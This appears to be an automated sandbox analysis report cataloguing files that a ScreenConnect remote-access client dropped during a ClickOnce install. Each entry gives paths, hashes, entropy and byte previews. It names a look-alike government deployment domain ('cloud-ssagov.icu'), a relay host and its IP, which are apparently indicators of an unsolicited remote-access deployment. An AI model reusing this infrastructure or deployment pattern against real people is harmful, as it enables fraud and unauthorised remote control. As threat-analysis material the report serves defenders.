SSDEEP:	3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
MD5:	3724F06F3422F4E42B41E23ACB39B152
SHA1:	1220987627782D3C3397D4ABF01AC3777999E01C
SHA-256:	EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
SHA-512:	509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..\|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	4.690426481732819
Encrypted:	false
SSDEEP:	48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:	2744E91BB44E575AD8E147E06F8199E3
SHA1:	6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:	805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
SHA-512:	586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.026150003724022
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCDtm/vXbAa3xT:2dL9hK6E46YP8gGSaSvH
MD5:	3A6D1C8F07AAEFF11EFC5F018A150DFF
SHA1:	89E385089E5F4F8B3D16900D94371AC19E0CFC75
SHA-256:	16AB797C35A25D8F08A0B6AEC7E57867BED0D644287ECDDD73889A05D1E16C4E
SHA-512:	3BA5327CAC75868E458D2C8D001A063E1BC54A1B7992C7AB2641348B6D0FB7EA3BD2870F39674DD992431F7634220D39B09CC0DDE04CA23CAF360A6B5D655556
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a27%3a02</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\yvgys1ph.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.026150003724022
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCDtm/vXbAa3xT:2dL9hK6E46YP8gGSaSvH
MD5:	3A6D1C8F07AAEFF11EFC5F018A150DFF
SHA1:	89E385089E5F4F8B3D16900D94371AC19E0CFC75
SHA-256:	16AB797C35A25D8F08A0B6AEC7E57867BED0D644287ECDDD73889A05D1E16C4E
SHA-512:	3BA5327CAC75868E458D2C8D001A063E1BC54A1B7992C7AB2641348B6D0FB7EA3BD2870F39674DD992431F7634220D39B09CC0DDE04CA23CAF360A6B5D655556
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a27%3a02</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.06942231395039
Encrypted:	false
SSDEEP:	1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
MD5:	5DB908C12D6E768081BCED0E165E36F8
SHA1:	F2D3160F15CFD0989091249A61132A369E44DEA4
SHA-256:	FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
SHA-512:	8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\86VMVS2K.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (603), with CRLF line terminators
Category:	modified
Size (bytes):	14722
Entropy (8bit):	3.8061342830345195
Encrypted:	false
SSDEEP:	96:t6BKLDo/dRdzeAO7B10iBBaOy0leDo/dRdzeAO7B1iRsI/p82kbuh1Do/dRdzeAg:E84iac8mheuC8BKLEv
MD5:	4585D9B277FBD8E741A03EAB8ED989D6
SHA1:	A20BE80C7CA8D7EC2815575576047A781E460565
SHA-256:	C1EDCAF1F273CFBF21788A543AE18E9F9E98F6F85311A721D412F2FCAF8F6EA7
SHA-512:	A841CE6BD819B03BE2EA163A02274C62D0D4F2EEEFF0C77EF86636125413BA91AD7F6C68454911DB8EBA0311D1DD87C72A6182E1EE92BD008135FD50C78F7599
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.-.s.s.a.g.o.v...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.a.p.i...w.i.s.e.s.c.r.e.e.n...n.e.t.&.p.=.8.0.4.1.&.s.=.9.2.9.8.e.1.6.8.-.a.0.c.f.-.4.8.8.d.-.9.5.4.c.

C:\Users\user\AppData\Local\Temp\Deployment\142A0BL0.XXZ\HTYO9NZZ.VH9.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
Category:	dropped
Size (bytes):	117161
Entropy (8bit):	5.583971122293747
Encrypted:	false
SSDEEP:	3072:xNIcT51/FXvMVNWfCXq9ym7m2o9HuzhJOvP:gcfiVIpmt8vOvP
MD5:	FE06C5E9C53AB451368667D3E3B1504B
SHA1:	7C76334BB2BC0D1E444A1FCAA484B642572CAD1E
SHA-256:	89EB055F32184DFE333494A271ED865958D5ADC1521043C6D81098F541CC0B3F
SHA-512:	B0C6570F937582B1072491506992AD077BD271B7301C26624A9418BAF77BBE5496D30EF3522D63D60EF8BEECC2CA113788B4A91833B99D931C841BAC0D051CAA
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.586775768189165
Encrypted:	false
SSDEEP:	3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
MD5:	3724F06F3422F4E42B41E23ACB39B152
SHA1:	1220987627782D3C3397D4ABF01AC3777999E01C
SHA-256:	EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
SHA-512:	509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..\|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.151589954158412
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AQ6vSkcyMQgcVSkTo:3FYZ8h9oYgI0AQWHMQgGTo
MD5:	618DC5F6C85A2057BC7A86C5F498E2F1
SHA1:	5073B2C3A117985E8F26ED5BEA8C93A5BB202EEA
SHA-256:	F1BF5014656D836A4C5C42E7ED67FF368D1706C41082E1E4F33ABF9CDA09D647
SHA-512:	A8ED838573EF9A4119A4D32335543EA5074250D47212068EF2C4B470A451EB0154BCEB8B3BF8B0722D4250122F6B5A196383576F715FD938D3CCB6CBDE7C2799
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.06942231395039
Encrypted:	false
SSDEEP:	1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
MD5:	5DB908C12D6E768081BCED0E165E36F8
SHA1:	F2D3160F15CFD0989091249A61132A369E44DEA4
SHA-256:	FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
SHA-512:	8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1632
Entropy (8bit):	5.089918322084496
Encrypted:	false
SSDEEP:	48:3FYZ8h9o9gI0AQGCHMQgTMQg3MQgGAXTo:1YiW0AQQQ9QvQyc
MD5:	4E77158D54337B51A6368D7D094397C4
SHA1:	3A029B30B95786ADF97FB3C0B1C37B11154E0344
SHA-256:	276B0232A7C76292D34207F916966EA1BCD5CD7E1E1D9A2751C663F06E45B63C
SHA-512:	69D7A90B2802575555E68991D157885253A72F5ED5181AF5795E52BB6165B979542F482BAC1E3CC164013133A4B812E1EC10BBCD39AA1166318099ABC267ED95
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95512
Entropy (8bit):	6.504684691533346
Encrypted:	false
